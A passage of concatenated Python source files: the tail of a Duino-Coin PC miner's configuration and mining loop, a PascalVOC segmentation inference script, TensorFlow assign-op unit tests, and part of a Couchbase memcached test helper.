+ "2" + Style.NORMAL + " - XXHASH")
algorithm = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if algorithm == "2":
algorithm = "XXHASH"
intensity = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_intensity")
+ Style.BRIGHT))
if not intensity:
intensity = 95
elif float(intensity) > 100:
intensity = 100
elif float(intensity) < 1:
intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
elif int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT)
else:
rig_id = "None"
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": Settings.DONATE_LVL,
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL + str(motd),
"success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL + get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success", "net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET + get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(str(result[0])
+ Settings.SEPARATOR
+ str(result[1])
+ Settings.SEPARATOR
+ "Official PC Miner ("
+ user_settings["algorithm"]
+ ") v" + str(Settings.VER)
+ Settings.SEPARATOR
+ str(user_settings["identifier"]))
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining") + str(e),
"error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
if __name__ == "__main__":
mining_start_time = time()
p_list = []
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
Miner.preload()
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
for i in range(int(user_settings["threads"])):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
test_multiprocess.py
|
import os
import cv2
import pylab
import warnings
import argparse
import numpy as np
import scipy.ndimage as nd
from multiprocessing import Process
import torch.nn.functional as F
import torch
import network as models
from utils.util import load_model
import krahenbuhl2013
import skimage.color as imgco
import skimage.io as imgio
warnings.filterwarnings('ignore', '.*output shape of zoom.*')
IMAGE_MEAN_VALUE = [104.0, 117.0, 123.0]
label2rgb_colors = np.array([(0, 0, 0), (128, 0, 0), (0, 128,0 ), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]) # using palette for pascal voc
def label2rgb(label,cls_label,colors=[],ignore_label=128,ignore_color=(255,255,255)):
if len(colors) <= 0:
index = np.unique(label)
index = index[index<21]
colors = label2rgb_colors[index]
label = imgco.label2rgb(label,colors=colors,bg_label=ignore_label,bg_color=ignore_color)
return label.astype(np.uint8)
def parser_args():
parser = argparse.ArgumentParser(description='Get segmentation prediction')
parser.add_argument("--image-list", default='./datalist/PascalVOC/val_id.txt', type=str, help="Path to image list")
parser.add_argument("--image-path", default='./dataset/PascalVOC/VOCdevkit/VOC2012',type=str, help="Path to image")
parser.add_argument('--cls-labels-path', default='./datalist/PascalVOC/cls_labels.npy', type=str)
parser.add_argument("--arch", default='deeplab_large_fov', type=str, help="Model type")
parser.add_argument("--trained", default='./train_log/1', type=str, help="Model weights")
parser.add_argument("--pred-path", default='./result/1', type=str, help="Output png file name")
parser.add_argument("--smooth", action='store_true', help="Apply postprocessing")
parser.add_argument('--gpu', dest='gpu_id', default=0, type=int, help='GPU device id to use [0]')
parser.add_argument('--split-size', default=8, type=int)
parser.add_argument('--num-gpu', default=1, type=int)
parser.add_argument('--color-mask', type=int, default=1)
args = parser.parse_args()
return args
def preprocess(image, size, mean_pixel):
image = np.array(image)
image = nd.zoom(image.astype('float32'),
(size / float(image.shape[0]), size / float(image.shape[1]), 1.0),
order=1)
# RGB to BGR
image = image[:, :, [2, 1, 0]]
image = image - np.array(mean_pixel)
# BGR to RGB
image = image.transpose([2, 0, 1])
return np.expand_dims(image, 0)
def predict_label_mask(image_file, model, smooth, gpu_id):
im = pylab.imread(image_file)
image = torch.from_numpy(preprocess(im, 321, IMAGE_MEAN_VALUE).astype(np.float32))
image = image.cuda(gpu_id)
featmap, _ = model(image)
scores = featmap.reshape(21, 41, 41).detach().cpu().numpy().transpose(1, 2, 0)
d1, d2 = float(im.shape[0]), float(im.shape[1])
scores_exp = np.exp(scores - np.max(scores, axis=2, keepdims=True))
probs = scores_exp / np.sum(scores_exp, axis=2, keepdims=True)
probs = nd.zoom(probs, (d1 / probs.shape[0], d2 / probs.shape[1], 1.0), order=1)
probs1 = probs
eps = 0.00001
probs[probs < eps] = eps
if smooth:
result = np.argmax(krahenbuhl2013.CRF(im, np.log(probs), scale_factor=1.0), axis=2)
else:
result = np.argmax(probs, axis=2)
return result
def predict_color_mask(image_file, model, smooth, gpu_id, cls_label):
cls_label = np.insert(cls_label, 0, 1)
cls_label = np.squeeze(np.asarray(np.nonzero(cls_label), dtype=int))
im = pylab.imread(image_file)
d1, d2 = float(im.shape[0]), float(im.shape[1])
image = torch.from_numpy(preprocess(im, 321, IMAGE_MEAN_VALUE).astype(np.float32))
image = image.cuda(gpu_id)
featmap = model(image)
featmap = featmap.reshape(21, 41, 41).detach().cpu().numpy().transpose(1, 2, 0)
featmap = nd.zoom(featmap, (d1 / featmap.shape[0], d2 / featmap.shape[1], 1.0), order=2)
if smooth:
crf_pred = krahenbuhl2013.CRF(im, np.array(featmap), scale_factor=1.0)
else:
crf_pred = featmap
output = label2rgb(np.argmax(featmap,axis=2), cls_label)
pred = label2rgb(np.argmax(crf_pred,axis=2), cls_label)
return output, pred
def save_mask_multiprocess(num, data_size):
process_id = os.getpid()
print('process {} starts...'.format(process_id))
if args.num_gpu == 1:
gpu_id = args.gpu_id
elif args.num_gpu == 2:
if num >= data_size // args.num_gpu:
gpu_id = args.gpu_id + 0
else:
gpu_id = args.gpu_id + 1
elif args.num_gpu == 4:
if num >= data_size // args.num_gpu * 3:
gpu_id = args.gpu_id + 0
elif num >= data_size // args.num_gpu * 2:
gpu_id = args.gpu_id + 1
elif num >= data_size // args.num_gpu * 1:
gpu_id = args.gpu_id + 2
else:
gpu_id = args.gpu_id + 3
else:
raise Exception("ERROR")
base_model = models.__dict__[args.arch](num_classes=21)
model = base_model
model = load_model(model, args.trained)
model = model.cuda(gpu_id)
model.eval()
if num == data_size - 1:
sub_image_ids = image_ids[num * len(image_ids) // data_size:]
else:
sub_image_ids = image_ids[num * len(image_ids) // data_size: (num + 1) * len(image_ids) // data_size]
if num == 0:
print(len(sub_image_ids), 'images per each process...')
for idx, img_id in enumerate(sub_image_ids):
if num == 0 and idx % 10 == 0:
print("[{0} * {3}]/[{1} * {3}] : {2} is done.".format(idx, len(sub_image_ids), img_id, args.split_size))
image_file = os.path.join(image_path, img_id + '.jpg')
cls_label = cls_list[img_id]
if args.color_mask:
output, pred = predict_color_mask(image_file, model, args.smooth, gpu_id, cls_label)
save_path = os.path.join(args.pred_path, "output" ,img_id + '_output.png')
cv2.imwrite(save_path, cv2.cvtColor(output, cv2.COLOR_RGB2BGR))
save_path = os.path.join(args.pred_path, "pred", img_id + '_pred.png')
cv2.imwrite(save_path, cv2.cvtColor(pred, cv2.COLOR_RGB2BGR))
else:
labelmap = predict_label_mask(image_file, model, args.smooth, gpu_id)
save_path = os.path.join(args.pred_path, "label_mask" ,img_id + '_labelmask.png')
cv2.imwrite(save_path, labelmap)
if __name__ == "__main__":
args = parser_args()
image_ids = [i.strip() for i in open(args.image_list) if not i.strip() == '']
image_path = os.path.join(args.image_path, 'JPEGImages')
if args.pred_path and (not os.path.isdir(args.pred_path)):
os.makedirs(args.pred_path)
pred = args.pred_path + "/pred"
output = args.pred_path + "/output"
label_mask = args.pred_path + "/label_mask"
if not os.path.isdir(pred):
os.makedirs(pred)
if not os.path.isdir(output):
os.makedirs(output)
if not os.path.isdir(label_mask):
os.makedirs(label_mask)
cls_list = np.load(args.cls_labels_path, allow_pickle=True).tolist()
split_size = args.split_size * args.num_gpu
numbers = range(split_size)
processes = []
for index, number in enumerate(numbers):
proc = Process(target=save_mask_multiprocess, args=(number, split_size,))
processes.append(proc)
proc.start()
for proc in processes:
proc.join()
|
dense_update_ops_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.Assign*."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
def _initAssignFetch(self, x, y, use_gpu=False):
"""Initialize a param to init and update it with y."""
super(AssignOpTest, self).setUp()
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
assign = state_ops.assign(p, y)
p.initializer.run()
new_value = assign.eval()
return p.eval(), new_value
def _initAssignAddFetch(self, x, y, use_gpu=False):
"""Initialize a param to init, and compute param += y."""
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
add = state_ops.assign_add(p, y)
p.initializer.run()
new_value = add.eval()
return p.eval(), new_value
def _initAssignSubFetch(self, x, y, use_gpu=False):
"""Initialize a param to init, and compute param -= y."""
with self.test_session(use_gpu=use_gpu):
p = variables.Variable(x)
sub = state_ops.assign_sub(p, y)
p.initializer.run()
new_value = sub.eval()
return p.eval(), new_value
def _testTypes(self, vals):
for dtype in [np.float32, np.float64, np.int32, np.int64]:
x = np.zeros(vals.shape).astype(dtype)
y = vals.astype(dtype)
var_value, op_value = self._initAssignFetch(x, y, use_gpu=False)
self.assertAllEqual(y, var_value)
self.assertAllEqual(y, op_value)
var_value, op_value = self._initAssignAddFetch(x, y, use_gpu=False)
self.assertAllEqual(x + y, var_value)
self.assertAllEqual(x + y, op_value)
var_value, op_value = self._initAssignSubFetch(x, y, use_gpu=False)
self.assertAllEqual(x - y, var_value)
self.assertAllEqual(x - y, op_value)
if test.is_built_with_cuda() and dtype in [np.float32, np.float64]:
var_value, op_value = self._initAssignFetch(x, y, use_gpu=True)
self.assertAllEqual(y, var_value)
self.assertAllEqual(y, op_value)
var_value, op_value = self._initAssignAddFetch(x, y, use_gpu=True)
self.assertAllEqual(x + y, var_value)
self.assertAllEqual(x + y, op_value)
var_value, op_value = self._initAssignSubFetch(x, y, use_gpu=False)
self.assertAllEqual(x - y, var_value)
self.assertAllEqual(x - y, op_value)
def testBasic(self):
self._testTypes(np.arange(0, 20).reshape([4, 5]))
def testAssignNonStrictShapeChecking(self):
with self.test_session():
data = array_ops.fill([1024, 1024], 0)
p = variables.Variable([1])
a = state_ops.assign(p, data, validate_shape=False)
a.op.run()
self.assertAllEqual(p.eval(), data.eval())
# Assign to yet another shape
data2 = array_ops.fill([10, 10], 1)
a2 = state_ops.assign(p, data2, validate_shape=False)
a2.op.run()
self.assertAllEqual(p.eval(), data2.eval())
def testInitRequiredAssignAdd(self):
with self.test_session():
p = variables.Variable(array_ops.fill([1024, 1024], 1), dtypes.int32)
a = state_ops.assign_add(p, array_ops.fill([1024, 1024], 0))
with self.assertRaisesOpError("use uninitialized"):
a.op.run()
def testInitRequiredAssignSub(self):
with self.test_session():
p = variables.Variable(array_ops.fill([1024, 1024], 1), dtypes.int32)
a = state_ops.assign_sub(p, array_ops.fill([1024, 1024], 0))
with self.assertRaisesOpError("use uninitialized"):
a.op.run()
# NOTE(mrry): See also
# dense_update_ops_no_tsan_test.AssignOpTest, which contains a benign
# data race and must run without TSAN.
def testParallelUpdateWithLocking(self):
with self.test_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
p.initializer.run()
def run_add(add_op):
sess.run(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
# NOTE(mrry): See also
# dense_update_ops_no_tsan_test.[...].testParallelAssignWithoutLocking,
# which contains a benign data race and must run without TSAN.
def testParallelAssignWithLocking(self):
with self.test_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
p.initializer.run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
data_helper.py
|
import copy
import hashlib
import json
import random
import socket
import threading
import time
import uuid
import zlib
from multiprocessing.process import BaseProcess as Process
from multiprocessing.queues import Queue
from queue import Queue
from random import Random
import crc32
import logger
import memcacheConstants
from mc_ascii_client import MemcachedAsciiClient
from mc_bin_client import MemcachedClient, MemcachedError
from membase.api.rest_client import RestConnection, RestHelper, Bucket, vBucket
from memcacheConstants import ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL, ERR_2BIG
from memcached.helper.old_kvstore import ClientKeyValueStore
from perf_engines import mcsoda
from TestInput import TestInputServer
from TestInput import TestInputSingleton
log = logger.Logger.get_logger()
try:
import concurrent.futures
except ImportError:
log.warning("{0} {1}".format("Can not import concurrent module.",
"Data for each server will be loaded/retrieved sequentially"))
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
# value_sizes {10:0.1,20:0.2:40:0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = ((number_of_items // number_of_threads) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}",
"payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
# choose one of the servers random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
# let's assume overhead per key is 64 bytes ?
how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
for size, probability in list(value_size_distribution.items()):
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
scope=None,
collection=None):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
scope=scope,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
scope=None,
collection=None):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi,
scope=scope,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def random_pick(list):
if list:
if len(list) > 1:
return list[Random().randint(0, len(list) - 1)]
return list[0]
# raise array empty ?
return None
@staticmethod
def direct_client(server, bucket, timeout=30, admin_user='cbadminbucket', admin_pass='password'):
log = logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
if vBuckets != None:
client.vbucket_count = len(vBuckets)
else:
client.vbucket_count = 0
bucket_info = rest.get_bucket(bucket)
# todo raise exception for not bucket_info
cluster_compatibility = rest.check_cluster_compatibility("5.0")
if cluster_compatibility is None:
pre_spock = True
else:
pre_spock = not cluster_compatibility
if pre_spock:
log.info("Atleast 1 of the server is on pre-spock "
"version. Using the old ssl auth to connect to "
"bucket.")
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
else:
if isinstance(bucket, Bucket):
bucket = bucket.name
bucket = bucket.encode('ascii')
client.sasl_auth_plain(admin_user, admin_pass)
client.bucket_select(bucket)
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False, standalone_moxi_port=None):
# for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params \
and TestInputSingleton.input.test_params["ascii"].lower() == "true") \
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
port_moxi = standalone_moxi_port or node.memcached
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedAsciiClient(server.ip, port_moxi, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], port_moxi, bucket))
client = MemcachedClient(server["ip"], port_moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedClient(server.ip, port_moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name,
bucket_info.saslPassword)
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def standalone_moxi_client(server, bucket, timeout=30, moxi_port=None):
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], moxi_port, bucket.name))
client = MemcachedClient(server["ip"], moxi_port, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, moxi_port, bucket.name))
client = MemcachedClient(server.ip, moxi_port, timeout=timeout)
if bucket.name != 'default' and bucket.authType == "sasl":
client.sasl_auth_plain(bucket.name.encode('ascii'),
bucket.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def flush_bucket(server, bucket, admin_user='cbadminbucket', admin_pass='password'):
# if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
retry_attempt = 5
while retry_attempt > 0:
client = MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user, admin_pass=admin_pass)
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
finally:
client.close()
return
class MutationThread(threading.Thread):
